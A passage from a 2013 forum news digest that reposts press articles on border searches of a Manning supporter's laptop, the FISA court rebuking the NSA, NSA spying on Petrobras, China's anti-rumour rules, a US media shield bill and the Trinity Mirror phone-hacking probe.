Federal agencies, including the FBI and IRS, as well as Interpol, can feed TECS with information and flag travelers' files.

In one case that reached a federal appeals court, Howard Cotterman wound up in the TECS system because a 1992 child sex conviction. That "hit" encouraged border patrol agents to detain his computer, which was found to contain child pornography. Cotterman's case ended up before the 9th Circuit Court of Appeals, which ruled this spring that the government should have reasonable suspicion before conducting a comprehensive search of an electronic device; but that ruling only applies to states that fall under that court's jurisdiction, and left questions about what constitutes a comprehensive search.

In the case of House, he showed up in TECS in July 2010, about the same time he was helping to establish the Bradley Manning Support Network. His TECS file, released as part of his settlement agreement, was the document that told border agents House was wanted in the questioning of the leak of classified material.

It wasn't until late October, though, that investigators noticed House's passport number in an airline reservation system for travel to Los Cabos. When he returned to Chicago O'Hare airport, the agents waiting for him took House's laptop, thumb drive, digital camera and cellphone. He was questioned about his affiliation with Manning and his visits to Manning in prison. The agents eventually let him go and returned his cell phone. But the other items were detained and taken to an ICE field office in Manhattan.

Seven weeks after the incident, House faxed a letter to immigration authorities asking that the devices be returned. They were sent to him the next day, via Federal Express.

By then agents had already created an "image" of his laptop, according to the documents. Because House had refused to give the agents his password and apparently had configured his computer in such a way that appeared to stump computer forensics experts, it wasn't until June 2011 that investigators were satisfied that House's computer didn't contain anything illegal. By then, they had already sent a second image of his hard drive to Army criminal investigators familiar with the Manning case. In August 2011, the Army agreed that House's laptop was clean and promised to destroy any files from House's computer.

Catherine Crump, an ACLU lawyer who represented House, said she doesn't understand why Congress or the White House are leaving the debate up to the courts.

"Ultimately, the Supreme Court will need to address this question because unfortunately neither of the other two branches of government appear motivated to do so," said Crump.

House, an Alabama native, said he didn't ask for any money as part of his settlement agreement and said his primary concern was ensuring that a document containing the names of Manning Support Network donors didn't wind up in a permanent government file. The court order required the destruction of all his files, which House said satisfied him.

He is writing a book about his experiences and his hope to create a youth-based political organization. House said he severed ties with the Support Network last year after becoming disillusioned with Manning and WikiLeaks, which he said appeared more focused on destroying America and ruining lives than challenging policy.

"That era was a strange time," House said. "I'm hoping we can get our country to go in a better direction."
http://www.nytimes.com/aponline/2013...-searches.html





Court Upbraided N.S.A. on Its Use of Call-Log Data
Scott Shane

Intelligence officials released secret documents on Tuesday showing that a judge reprimanded the National Security Agency in 2009 for violating its own procedures and misleading the nation’s intelligence court about how it used the telephone call logs it gathers in the hunt for terrorists.

It was the second case of a severe scolding of the spy agency by the Foreign Intelligence Surveillance Court to come to light since the disclosure of thousands of N.S.A. documents by Edward J. Snowden, a former contractor, began this summer.

The newly disclosed violations involved the N.S.A. program that has drawn perhaps the sharpest criticism from members of Congress and civil libertarians: the collection and storage for five years of information on virtually every phone call made in the United States. The agency uses orders from the intelligence court to compel phone companies to turn over records of numbers called and the time and duration of each call — the “metadata,” not the actual content of the calls.

Since Mr. Snowden disclosed the program, the agency has said that while it gathers data on billions of calls, it makes only a few hundred queries in the database each year, when it has “reasonable, articulable suspicion” that a telephone number is connected to terrorism.

But the new documents show that the agency also compares each day’s phone call data as it arrives with an “alert list” of thousands of domestic and foreign phone numbers that it has identified as possibly linked to terrorism.

The agency told the court that all the numbers on the alert list had met the legal standard of suspicion, but that was false. In fact, only about 10 percent of 17,800 phone numbers on the alert list in 2009 had met that test, a senior intelligence official said.

In a sharply worded March 2009 ruling, Judge Reggie B. Walton described the N.S.A.’s failure to comply with rules set by the intelligence court, set limits on how it could use the data it had gathered, and accused the agency of repeatedly misinforming the judges.

“The government has compounded its noncompliance with the court’s orders by repeatedly submitting inaccurate descriptions of the alert list process” to the court, Judge Walton wrote. “It has finally come to light that the F.I.S.C.’s authorizations of this vast collection program have been premised on a flawed depiction of how the N.S.A. uses” the phone call data.

The senior American intelligence official, briefing reporters before the documents’ release, admitted the sting of the court’s reprimand but said the problems came in a complex, highly technical program and were unintentional.

“There was nobody at N.S.A. who really had a full understanding of how the program was operating at the time,” said the official, who spoke on the condition of anonymity. The official noted that the agency itself discovered the problem, reported it to the court and to Congress, and worked out new procedures that the court approved.

In making public 14 documents on the Web site of the director of national intelligence, James R. Clapper Jr., the intelligence officials were acting in response to Freedom of Information Act lawsuits and a call from President Obama for greater transparency about intelligence programs. The lawsuits were filed by two advocacy groups, the Electronic Frontier Foundation and the American Civil Liberties Union.

“The documents only begin to uncover the abuses of the huge databases of information the N.S.A. has of innocent Americans’ calling records,” said Mark M. Jaycox, a policy analyst at the Electronic Frontier Foundation. He said the agency’s explanation — that none of its workers fully understood the phone metadata program — showed “how much of a rogue agency the N.S.A. has become.”

Judge Walton’s ruling, originally classified as top secret, did not go that far. But he wrote that the privacy safeguards approved by the court “have been so frequently and systematically violated” that they “never functioned effectively.”

Senator Patrick J. Leahy of Vermont, the chairman of the Senate Judiciary Committee, welcomed the release of the documents, but said that they showed “systemic problems” and that the bulk collection of Americans’ phone records should be stopped.

Intelligence officials have expressed some willingness to adjust the program in response to complaints from Congress and the public, possibly by requiring the phone companies, rather than the N.S.A., to stockpile the call data. But they say that the program remains crucial in detecting terrorist plots and is now being run in line with the court’s rules.

A different intelligence court judge, John D. Bates, rebuked the N.S.A. in 2011 for violations in another program and also complained of a pattern of misrepresentation. The 2011 opinion, which made a reference to the 2009 reprimand, was released by intelligence officials last month.

Since June, Mr. Snowden’s revelations have set off the most extensive public scrutiny of the N.S.A. since its creation in 1952. Last week, based on his documents, The New York Times, ProPublica and The Guardian wrote about the agency’s systematic efforts to defeat privacy protections for Internet communications, including evidence that the agency deliberately weakened an encryption standard adopted nationally and internationally in 2006.

On Tuesday, the National Institute of Standards and Technology, the agency charged with setting federal cybersecurity standards, scrambled to try to restore public confidence, after reports that it had recommended a standard that contained a back door for the N.S.A.

The agency said it would reopen the public vetting process for the standard, used by software developers around the world. “If vulnerabilities are found in these or any other N.I.S.T. standard, we will work with the cryptographic community to address them as quickly as possible,” the agency said in a statement.

The Times reported that as part of the N.S.A.’s efforts, it had worked behind the scenes to push the same standard on the International Organization for Standardization, which counts 163 countries among its members.

The national standards agency denied that it had ever deliberately weakened a cryptographic standard, and it moved to clarify its relationship with the N.S.A. “The National Security Agency participates in the N.I.S.T. cryptography process because of its recognized expertise,” the standards agency said. “N.I.S.T. is also required by statute to consult with the N.S.A.”

Cryptographers said that the revelations last week had eroded their trust in the agency, but that reopening the review process was an important step in rebuilding confidence.

“I know from firsthand communications that a number of people at N.I.S.T. feel betrayed by their colleagues at the N.S.A.,” Matthew D. Green, a cryptography researcher at Johns Hopkins University, said in an interview on Tuesday. “Reopening the standard is the first step in fixing that betrayal and restoring confidence in N.I.S.T.”

Nicole Perlroth contributed reporting.
http://www.nytimes.com/2013/09/11/us...-log-data.html





N.S.A. Spied on Brazilian Oil Company, Report Says
Simon Romero

The National Security Agency spied on Petrobras, Brazil’s giant national oil company, according to a report here on Sunday night by the Globo television network, in the latest revelation of the agency’s surveillance methods that have raised tension between Brazil and the United States.

Still, details were sparse in the report as to precisely what information the N.S.A. may have obtained from spying on Petrobras, raising questions about what objectives the agency could have in targeting the company, which is controlled by Brazil’s government and ranks among the world’s largest oil producers.

The report, based on documents obtained from Edward J. Snowden, the former N.S.A. contractor, said Petrobras figured among other prominent N.S.A. targets, including Google; the Society for Worldwide Interbank Financial Telecommunication, or Swift, a consortium based in Belgium that aims to allow banks around the world to securely exchange financial information; and France’s Ministry of Foreign Affairs.

It was the latest in a series of reports here in which Glenn Greenwald, an American journalist living in Rio de Janeiro who is working with Globo, has shed light on N.S.A. activities in Latin America from documents given to him by Mr. Snowden.

In a report last week, Globo revealed that the N.S.A. had spied on the presidents of Brazil and Mexico and their top aides, producing an angry reaction from Brazil’s president, Dilma Rousseff, who held out the possibility of canceling a state visit to Washington in October that was arranged to recognize Brazil’s importance to the United States.

In a statement issued after the Globo report was aired, James R. Clapper, the Obama administration’s director of national intelligence, said that it was no secret that the United States government collected intelligence about financial matters. Mr. Clapper said that doing so was needed to gather insight into the economic policies of other countries.

“What we do not do, as we have said many times, is use our foreign intelligence capabilities to steal the trade secrets of foreign companies on behalf of — or give intelligence we collect to — U.S. companies to enhance their international competitiveness or increase their bottom line,” Mr. Clapper said in the statement.

Petrobras did not immediately reply to a request for comment on the televised report on Sunday night.

Globo acknowledged in its report that it was unclear what information the N.S.A. was seeking by spying on Petrobras, but the television network emphasized that the company controlled vast quantities of data on Brazil’s offshore oil fields. Brazil is planning to auction exploration licenses in October that would allow foreign oil companies to form ventures with Petrobras to explore for oil in deep-sea areas.

Petrobras has symbolized Brazil’s ambition of emerging as a global energy powerhouse after discoveries over the last decade of large offshore oil reserves, but the sprawling company has recently struggled with delays of major oil projects, soaring debt and declining production at some of its older offshore oil fields.

In contrast to some other major oil-producing countries like Mexico and Saudi Arabia, where state-controlled oil companies hold monopolies, Brazil already allows international oil companies to have extensive operations. While Petrobras still wields by far the most influence in Brazil’s oil industry, American, Chinese and European energy companies have been seeking to expand here.
http://www.nytimes.com/2013/09/09/wo...port-says.html





Beijing’s Ban on Internet Rumors Threatens Free Speech. And Some in China Aren’t Afraid to Say it.
Brian Fung

The Chinese Internet isn’t exactly known as a hotbed for free speech. But judging by a few recent events, debate about how the Internet in China should be managed is gaining steam.

Beijing has been embroiled in a campaign against online rumor-mongering of late. In a recent judicial ruling, the government announced stiff penalties for posting rumors that get shared 500 times or seen 5,000 times. Civil-liberties advocates say the ruling, with its possible three-year jail sentence, sets a dangerous precedent for free speech.

The new law is so extreme that even some domestic intellectuals have begun criticizing it.

Among the critics is Zhu Mingguo, a key party official in the province of Guangdong. His criticism of the anti-rumor rule might sound familiar to some in the West frustrated with how legacy organizations have adapted (or not) to new technology.

“In an environment of new media, we should take the initiative … and seek breakthroughs in propaganda on the Internet … and should not simply resort to the means of ‘delete’, ‘shut down’ and ‘reject’,” Zhu said, according to local media reports last week.

Zhu isn’t the only official to voice his concerns over the crackdown. According to the South China Morning Post, Guangzhou law enforcement called the new policy a potential “nightmare” on its microblog — a post that was then shared by another provincial body’s official account.

Between Zhu’s comments and the public outcry online, a feisty discussion over Internet governance appears to be afoot in a country known for sending undercover agents into chatrooms and forums to spread propaganda.

China’s digitally engaged population could make a bigger difference than you think. Its ranks aren’t full of clicktivists. Instead, there’s a robust cybersleuthing community whose forensic abilities far surpass Reddit even on its best days. These private investigators root out corruption by performing “human flesh searches” that turn up photos of government largesse and wrongdoing. The creepy term notwithstanding, the online gumshoes became part of a high-profile case last year involving a bureaucrat who bought luxury watches and grinned at the sight of human misfortune.

Photos can be doctored, of course, and it’s not clear whether human flesh searches would be at risk under the new anti-rumor policy. But the resistance to the judicial ruling is evidence that the Chinese Internet is far more diverse than we sometimes give it credit for.
http://www.washingtonpost.com/blogs/...y-it/?hpid=z12





Congress shall make no law…

Senate Panel OKs Measure Defining a Journalist
Donna Cassata

A Senate panel on Thursday approved a measure defining a journalist, which had been an obstacle to broader media shield legislation designed to protect reporters and the news media from having to reveal their sources.

The Judiciary Committee's action cleared the way for approval of legislation prompted by the disclosure earlier this year that the Justice Department had secretly subpoenaed almost two months of telephone records for 21 phone lines used by reporters and editors for The Associated Press and secretly used a warrant to obtain some emails of a Fox News journalist. The subpoenas grew out of investigations into leaks of classified information to the news organizations.

The AP received no advance warning of the subpoena.

The vote was 13-5 for a compromise defining a "covered journalist" as an employee, independent contractor or agent of an entity that disseminates news or information. The individual would have been employed for one year within the last 20 or three months within the last five years.

It would apply to student journalists or someone with a considerable amount of freelance work in the last five years. A federal judge also would have the discretion to declare an individual a "covered journalist," who would be granted the privileges of the law.

The committee later approved the overall bill on a 13-5 vote.

Sen. Chuck Schumer, D-N.Y., a chief proponent of the medial shield legislation, worked with Sens. Dianne Feinstein, D-Calif., and Dick Durbin, D-Ill., as well as representatives from news organizations, on the compromise.

The bill would protect reporters and news media organizations from being required to reveal the identities of confidential sources, but it does not grant an absolute privilege for journalists.

Sen. Jeff Sessions, R-Ala., complained that the definition of a journalist was too broad. Pushing back, Feinstein said the intent was to set up a test to determine a bona fide journalist.

"I think journalism has a certain tradecraft. It's a profession. I recognize that everyone can think they're a journalist," Feinstein said.

The overall measure would incorporate many of the changes proposed by Attorney General Eric Holder in July. Criticism of the collection of the material without any notice to the news organizations prompted President Barack Obama to order Holder to review the department's policy.

Holder's revised guidelines called for the government to give advance notice to the news media about subpoena requests for reporters' phone records unless the attorney general determines such notice would pose a clear and substantial threat to the investigation. Search warrants for a reporter's email would only apply when the individual is the focus of a criminal investigation for conduct not connected to ordinary newsgathering.

The bill makes clear that before the government asks a news organization to divulge sources, it first must go to a judge, who would supervise any subpoenas or court orders for information. Such orders would be limited, if possible, "in purpose, subject matter and period of time covered so as to avoid compelling disclosure of peripheral, nonessential or speculative information."

Holder's revised guidelines do not call for a judge to be involved before the government asks a news organization to divulge sources. However, the guidelines call for a new standing News Media Review Committee to advise the attorney general on such requests.

Reporters must be notified within 45 days of a request, a period that could be extended another 45 days but no more.

In the AP story that triggered one of the leak probes, the news organization reported that U.S. intelligence had learned that al-Qaida's Yemen branch hoped to launch a spectacular attack using a new, nearly undetectable bomb aboard a U.S.-bound airliner around the anniversary of Osama bin Laden's death.

In the Fox News story, reporter James Rosen reported that U.S. intelligence officials had warned Obama and senior U.S. officials that North Korea would respond to a U.N. Security Council resolution condemning nuclear tests with another nuclear test.
http://www.breitbart.com/Big-Journal...g-a-journalist





Mirror Investigated Over Criminal Liability for Alleged Phone Hacking

Publisher of Daily and Sunday Mirror says Met is investigating if it is 'criminally liable' for alleged hacking by previous employees
Josh Halliday and Lisa O'Carroll

The publisher of the Sunday Mirror has said it is under investigation by the Metropolitan police in relation to alleged phone hacking.

Trinity Mirror, which also publishes the Daily Mirror, said in a statement to the stock exchange on Thursday morning that the Metropolitan police was investigating whether it was "criminally liable" for an alleged phone-hacking conspiracy by previous employees.

The announcement is the clearest admission by the newspaper group that it is under investigation as part of Operation Weeting, Scotland Yard's two-year inquiry into the phone-hacking scandal.

Trinity Mirror said: "Trinity Mirror plc notes that its subsidiary, MGN Limited, publisher of the group's national newspapers, has been notified by the Metropolitan police that they are at a very early stage in investigating whether MGN is criminally liable for the alleged unlawful conduct by previous employees in relation to phone hacking on the Sunday Mirror.

"The group does not accept wrongdoing within its business and takes these allegations seriously. It is too soon to know how these matters will progress and further updates will be made if there are any significant developments."

The notification by the Met is a serious development for MGN and indicates that the police are investigating the company for a corporate charge as opposed to individual charges against journalists who have been arrested in related to allegations of phone hacking.

MGN has made the notification public because it is obliged to inform shareholders of any development that could have a material impact on its stock. By mid morning Trinity Mirror's shares had dropped 5% to £123.25.

News International, now rebranded News UK, did not reveal it had been told by the police that it was being investigated for corporate charges in May 2012, possibly because the company was not separately listed on the London stock market. However it emerged in the Leveson inquiry in July 2012 when the head of the investigation into alleged phone hacking and unlawful payments for stories, Sue Akers, gave evidence.

It was reported last month that one of Rupert Murdoch's most senior lawyers had been interviewed under caution on behalf of the company and two other very senior figures have been officially cautioned for corporate offences.

It has also been widely reported that American authorities are investigating Murdoch's companies in the US for possible corporate charges for alleged violation of the Foreign Corrupt Practices Act.

This month Dan Evans, a former Sunday Mirror reporter, became the first journalist to be charged over an alleged conspiracy to hack phones who was not working at the News of the World. Evans, who worked at the Sunday Mirror between 2002 and 2004 and the News of the World from 2005, is accused of four counts of alleged criminal activity, including a conspiracy to hack the phones of "well-known people and their associates" between 2003 and 2010.

Scotland Yard first announced in March that it was investigating what it alleged was a separate conspiracy to the phone-hacking scandal at the News of the World.

On 14 March the force arrested four former Sunday Mirror journalists – including its former editor, Tina Weaver – on suspicion of being involved in an alleged phone-hacking conspiracy between 2003 and 2004.

The other three ex-Sunday Mirror journalists arrested were the Sunday People editor, James Scott, his deputy, Nick Buckley and Mark Thomas, the former People editor.
http://www.theguardian.com/media/201...-phone-hacking

















Until next week,

- js.



















Current Week In Review





Recent WiRs -

September 7th, August 31st, August 24th, August 17

Jack Spratts' Week In Review is published every Friday. Submit letters, articles, press releases, comments, questions etc. in plain text English to jackspratts (at) lycos (dot) com. Submission deadlines are Thursdays @ 1400 UTC. Please include contact info. The right to publish all remarks is reserved.


"The First Amendment rests on the assumption that the widest possible dissemination of information from diverse and antagonistic sources is essential to the welfare of the public."
- Hugo Black
JackSpratts is offline   Reply With Quote
Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

vB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
Peer-To-Peer News - The Week In Review - November 24th, '12 JackSpratts Peer to Peer 0 21-11-12 09:20 AM
Peer-To-Peer News - The Week In Review - July 16th, '11 JackSpratts Peer to Peer 0 13-07-11 06:43 AM
Peer-To-Peer News - The Week In Review - January 30th, '10 JackSpratts Peer to Peer 0 27-01-10 07:49 AM
Peer-To-Peer News - The Week In Review - January 16th, '10 JackSpratts Peer to Peer 0 13-01-10 09:02 AM
Peer-To-Peer News - The Week In Review - December 5th, '09 JackSpratts Peer to Peer 0 02-12-09 08:32 AM






All times are GMT -6. The time now is 03:52 PM.


Powered by vBulletin® Version 3.6.4
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
© www.p2p-zone.com - Napsterites - 2000 - 2024 (Contact grm1@iinet.net.au for all admin enquiries)